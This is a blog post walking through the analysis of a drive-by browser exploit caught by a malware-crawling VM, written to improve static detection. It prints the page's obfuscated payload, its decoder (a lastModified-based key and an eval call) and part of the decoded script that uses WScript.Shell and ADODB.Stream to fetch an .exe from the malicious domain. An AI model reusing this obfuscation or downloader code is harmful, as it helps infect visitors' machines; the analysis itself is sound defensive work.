Malware Analysis Walking Tour

Part of my day job lately has been to build up a catalog of drive-by browser exploits and so I decided to put up some notes on the process. When I first started taking apart malware, the detailed examples I found online were invaluable, so I’m putting this up partly to try to give back and partly to try to make the whole process a little more accessible to the interested but not-quite-as-technical reader. Feel free to post a reply or contact me with questions or comments.

Getting Started

Sometimes finding a piece of malware to examine can be the first hurdle in doing any analysis. Here we have it pretty easy; we run a malware scanner that crawls the net with a swarm of unpatched virtual machines and monitors them to detect unusual behavior. When one of them exhibits symptoms of malware we can dump information about what happened to the machine, restore it from a snapshot, and send it back out to continue trawling.

Here we can see that the root page of nevpizdy-nenyznie50domain.in caused some suspect behavior on an unpatched XP/IE6 VM. Let’s take a look at what happened.

The static analysis came back clean. No real surprise there, since static analysis is a coarse-grained, best effort type approach; it picks up the obvious stuff, but it’s easy to fool. This exploit is going to be worth looking into, if for no other reason than it will help us refine our static analysis detections.

Runtime (aka dynamic) analysis is where we’re really going to see stuff happen. Here we see a new process being executed from some binary file that shouldn’t be there; whatever the exploit is, the words “arbitrary code execution” are going to show up in the description.

I don’t know where that file came from at this point; best guess is that it’s being downloaded from some remote site rather than written manufactured by logic on the page. We’ll see.

Time to get out of the GUI and get our hands dirty. Before I get to the code, a word of warning: don’t go visit these urls. They’ve demonstrably owned a machine already, so unless you really want to know if it happens every time you should probably keep your hands in your pockets on this one.

$ mkdir nevpizdy-nenyznie50domain.in
$ cd nevpizdy-nenyznie50domain.in/
$ touch notes
$ wgetasie http://nevpizdy-nenyznie50domain.in
$ chmod -w index.html
$ less index.html
<html><body><div style="display: none"><ul><li
id="khBsFxi">153n168Q161h150s167b156H162S161s83v118K162K160c163U159w152a167I152y91t92i61y174b61Q83Z83F83b83V166n152I167D135i156d160r152z162K168k167a91R90D159T162N150O148d167q156i162a161R97r155Z165K152Z153X83m112p83w85s148R149S162f168Z167W109O149C159N148O161N158y85p90e95B83I100s99P99m99i99y92M110z61q176l61K61P15
3J168w161F150G167p156X162Y161U83w122u162j91z148I92x61M174G61m83r83I83v83k169Y148h165T83W166u83T112N83g118d165c152p148a167i152w130P91F148U95k83C90P138U134C150Y165R156P163e167E97H134n155z152r159L159h90L92i110b61e83v83H83I83Y169x148j165G83t162y83M112O83j118O165d152D148Q167C152V130g91h148a95n83U90a116e119f130H119q1
[...]

Hmm, clearly some obfuscated exploit code, but doesn’t look like an encoding I’ve seen before. There’s a lot of that junk (full content in Appendix 1 of this pdf if you want to follow along), but what comes after is more immediately interesting (if horribly ugly):

 
<script>function zacabab (abeicd) { var terry = abeicd.split(':'); var merry = 'zxc'; return terry[2];};</script>
<script>
 var FhcL0z0 = new String(""); FhcL0z0 = document.getElementById("khBsFxi").innerHTML;
g6VZ13w8 = document.lastModified; k0miOe5c = zacabab(g6VZ13w8); FhcL0z0 =  FhcL0z0.replace(/[^0-9]/g,';');
function aXzLA9jbkkRMIW ( OzNL6t,em7lqjVq ) { var AYMQGuD7 = new String();var bsL1aXtpUc = new String();
 var mXhEn59Xi = OzNL6t.split(';'); for(euWM8 = 0;euWM8 < mXhEn59Xi.length-1;euWM8++)
 { AYMQGuD7 = String['f#ro!mC#ha@r^C&ode'.replace(/@|&|#|\^|\!|\(|\)/ig, '')](mXhEn59Xi[euWM8] - em7lqjVq);
bsL1aXtpUc = bsL1aXtpUc + AYMQGuD7;} return bsL1aXtpUc;}var vnfjqq = Date();LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);
var mXhEn59Xi = 'AYMQGuD7';function krasddk(zxc) {eval(zxc); return;};krasddk( LCEsM );</script>

This is the decoding part of the script (or a pretty-printed version in Appendix 2 of the pdf). So, there are two ways to do this right now; one is carefully take this script apart and manually decode it piece by piece, the other way is to let it do its thing in a javascript debugger and just grab whatever it decodes from memory. The later is a lot faster.

Since this is a payload that targets Windows machines and I’m on a reduced privilege account on a linux machine, it’s reasonable to let this thing run. Just in case, I take a moment to switch Firefox to use Paros proxy so that if the script makes any requests I can record them and then drop them.

I open up Firebug on a blank page, set “Break on Next”, and then load the index.html that I pulled down with wget. When the page has finished rendering, I take a look at the DOM to see if anything jumps out at me; in this case, something does.

FhcL0z0 = "153;168;161;150;167;156;162;161;83;118;162;160;163;159;152;167;152;91;92;61;174;61;83;83;83;83;166;152;167;135;156;160;152;162;168;167;91;90;159;162;150;148;167;156;162;161;97;155;165;152;153;83;112;83;85;148;149;162;168;167;109;149;159;148;161;158;85;90;95;83;100;99;99;99;99;92;110;61;176;61;61;153;168;161[…]

So FhcL0z0 is now interesting. Where did it come from?

FhcL0z0 = document.getElementById("khBsFxi").innerHTML;
FhcL0z0 =  FhcL0z0.replace(/[^0-9]/g,';');

Remember the <li> that started out with “153n168Q161h150s167…”? It turns out that strange looking “encoding” scheme was just sticking random letters between the sets of numbers. This is a case that code reading could have turned up the info just as quickly as running the script: two methods, both will usually work.

The nice thing about running it is that there’s still lots of stuff in the DOM to look at. Back to Firebug:

LCEsM =function Complete()
{
    setTimeout('location.href = \"about:blank\"', 10000);
}
function Go(a)
{
    var s = CreateO(a, 'WScript.Shell');
    var o = CreateO(a, 'ADODB.Stream');
    var e = s.Environment('Process');
    var urltofile = 'http://nevpizdy-nenyznie50domain.in/feedback.php?page=1';
    var filename = 'hgivV.exe';
    var xhr = null;
    var bin = e.Item('TEMP') + '\\' + filename;
[...]

Hey, that’s nice. There’s only one layer of obfuscation going on here; once we get through the junk in FhcL0z0, it’s pretty readable (they even left the linebreaks in, how thoughtful). This is the code that actually performs the exploit; it gets executed via a gently-obfuscated eval() call at the end of the script tag: krasddk( LCEsM );
We don’t really need to know at this point, but it might be instructive to figure out where LCEsM came from.

LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);

Long story short, LCEsM is produced by decoding FhcL0z0 using a function and a key. The function is a simple for-loop that walks the input string and executes an obfuscated call to fromCharCode. The key is from

g6VZ13w8 = document.lastModified;
k0miOe5c = zacabab(g6VZ13w8);

The zacabab() function just splits the date at the “:” and returns the final string. Firebug tells me that the last modified date of the file is “12/28/2009 14:42:51” (and examining g6VZ13w8 and k0miOe5c confirms this); therefore the key needed to decode it is 51. A quick check verifies that we understand the encoding scheme.

$ python
>>> encoded = "153;168;161;150;167;156;162;161"
>>> "".join([chr(int(c) - 51) for c in encoded.split(";")])
'function'

As an aside, this is a perfect example of why DRM is ultimately a losing battle; if you provide someone with the ciphertext, the scrambling method, and the key, then you have provided them with everything they need to compromise your system. It works the same no matter if you’re a blackhat or a movie studio.

Back to the analysis, a quick bravo is called for for the folks behind wget. It correctly preserved the Last Modified date while saving the page to the filesystem; without that, there would be been a lot more trial and error to figuring out the key. Thanks Hrvoje Niksic and Micah Cowan!

$ stat index.html
[...]
Modify: 2009-12-28 14:42:51.000000000 -0800

It seems that the detour to figure out how LCEsM was encoded was time well spent. We learned about an interesting obfuscation scheme (using lastModified) and learned that wget easily mitigates it. We can add this sort of information to static detections to correlate different exploits encoded by the same toolkit and do trending on related malware.

Next Time: The Exploit

One Response to “Malware Analysis Walking Tour”

  1. Coffee To Code » Blog Archive » Malware Analysis Walking Tour (The Exploit) Says:

    […] Coffee To Code Percolating Ideas on Computing & Security « Malware Analysis Walking Tour […]

Leave a Reply